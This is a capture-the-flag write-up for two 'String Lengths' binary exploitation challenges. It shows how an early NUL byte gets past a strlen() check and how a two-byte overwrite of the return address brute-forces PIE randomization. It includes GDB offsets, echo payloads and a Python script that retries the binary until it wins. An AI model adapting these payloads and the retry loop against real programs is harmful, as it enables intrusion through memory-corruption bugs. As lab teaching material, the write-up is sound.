String Lengths

String Lengths (easy)

  1. In GDB, disas win_authed: the instruction right after the auth check is at 0x211f (a PIE offset, not an absolute address).
  2. As printed by the challenge's debug output, the saved return address of challenge() sits 72 bytes past the start of the input buffer.
  3. From the source, the input length as measured by strlen() must be < 28. strlen() stops at the first NUL byte, but the input is read in full, so a NUL placed early in the payload passes the length check while the bytes after it still reach the saved return address.

```shell
echo -n -e "aaa\x00aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x1f\x21" | /challenge/binary-exploitation-null-write-w
```

We overwrite only the low two bytes of the saved return address; its upper bytes are left intact and already point into the same PIE binary. PIE randomizes the load base at page granularity, so the low 12 bits (three nibbles) of every code address are fixed by the binary's layout, but the fourth least-significant nibble depends on the random base and has to be guessed. The guess is wrong 15 times out of 16. This is fine: just run the exploit until it works (statistically, about a 50% cumulative chance of success after 11 attempts and about 90% after 36).

String Lengths (hard)

  1. In gdb, disas win_authed, disas main, disas challenge tell us:

    • Instruction after auth check is at 0x1797
    • challenge() returns at 0x1ace
    • return value of strlen() must be <= 0x70 = 112
  2. Set a breakpoint with b *challenge+413, run, and give a short string of a's as input

  3. info frame -> rbp is at 0x7ffcc677a8f0
  4. x/100xg $rbp-200:
    • input buffer starts at 0x7ffcc677a850, which is rbp-0xa0 = rbp-160
    • return address is stored at 0x7ffcc677a8f8, which is rbp+0x8 = rbp+8
  5. 168 bytes of padding (a NUL at byte 5 keeps strlen() under the limit) followed by the desired two bytes (one of the four nibbles is a guess, so the exploit has to be run a few times):

```shell
echo -n -e "aaaaa\x00aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x97\x17" | /challenge/binary-exploitation-null-write
```
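Both variants are the same technique with different numbers, so here is one added example (not part of the original writeup) that builds the payload from the offsets found above, checks it the way the challenge's strlen() would, computes the retry odds from the section on guessing the PIE nibble, and retries the binary until it wins. The binary paths, offsets, limits and target offsets are the ones recorded in the writeup; the success marker `pwn.college{` and the 64-attempt cap are assumptions.

```python
#!/usr/bin/env python3
"""Null-write partial overwrite for the String Lengths challenges.
Added example: parameters come from the writeup, the rest is assumed."""
import os
import subprocess
import sys

# Values recovered in the writeup for each variant.
CHALLENGES = {
    "easy": dict(binary="/challenge/binary-exploitation-null-write-w",
                 ret_offset=72,    # saved return address is 72 bytes past the buffer
                 nul_at=3,         # NUL position: strlen(input) must be < 28
                 target=0x211f),   # PIE offset of the instruction after the auth check
    "hard": dict(binary="/challenge/binary-exploitation-null-write",
                 ret_offset=168,   # buffer at rbp-160, return address at rbp+8
                 nul_at=5,         # strlen(input) must be <= 0x70 (112)
                 target=0x1797),
}

SUCCESS_MARKER = b"pwn.college{"   # assumed: what a winning run prints


def build_payload(ret_offset, nul_at, target, fill=b"a"):
    """Padding up to the saved return address with an early NUL so strlen()
    sees a short string, then the low two bytes of the target in little
    endian. The upper bytes of the saved return address are left alone;
    they already point into the same PIE image."""
    pad = fill * nul_at + b"\x00" + fill * (ret_offset - nul_at - 1)
    assert len(pad) == ret_offset
    return pad + (target & 0xffff).to_bytes(2, "little")


def c_strlen(data):
    """Length as the challenge's strlen() measures it: bytes before the first NUL."""
    return data.index(b"\x00") if b"\x00" in data else len(data)


def success_probability(attempts):
    """P(at least one hit) when one randomized nibble (1/16) is guessed per run."""
    return 1 - (15 / 16) ** attempts


def run_until_win(name, max_attempts=64):
    """Feed the payload to the binary until the fourth nibble guess is right.
    Returns (attempt_number, stdout) on success or (None, None) otherwise."""
    cfg = CHALLENGES[name]
    payload = build_payload(cfg["ret_offset"], cfg["nul_at"], cfg["target"])
    for attempt in range(1, max_attempts + 1):
        proc = subprocess.run([cfg["binary"]], input=payload, capture_output=True)
        if SUCCESS_MARKER in proc.stdout:
            return attempt, proc.stdout
    return None, None


if __name__ == "__main__":
    name = sys.argv[1] if len(sys.argv) > 1 else "easy"
    cfg = CHALLENGES[name]
    payload = build_payload(cfg["ret_offset"], cfg["nul_at"], cfg["target"])
    print(f"{name}: {len(payload)} bytes, strlen()={c_strlen(payload)}, "
          f"overwrite={payload[-2:].hex()}")
    if os.path.exists(cfg["binary"]):
        attempt, out = run_until_win(name)
        print(f"won on attempt {attempt}" if attempt else "no win in 64 attempts")
        if out:
            sys.stdout.buffer.write(out)
    else:
        print("binary not present; payload hex:", payload.hex())
```

Run as `python3 exploit.py easy` or `python3 exploit.py hard` inside the challenge environment. Without the binary it only prints the payload, which is enough to confirm the NUL position, the total length and the two overwrite bytes match the echo commands above.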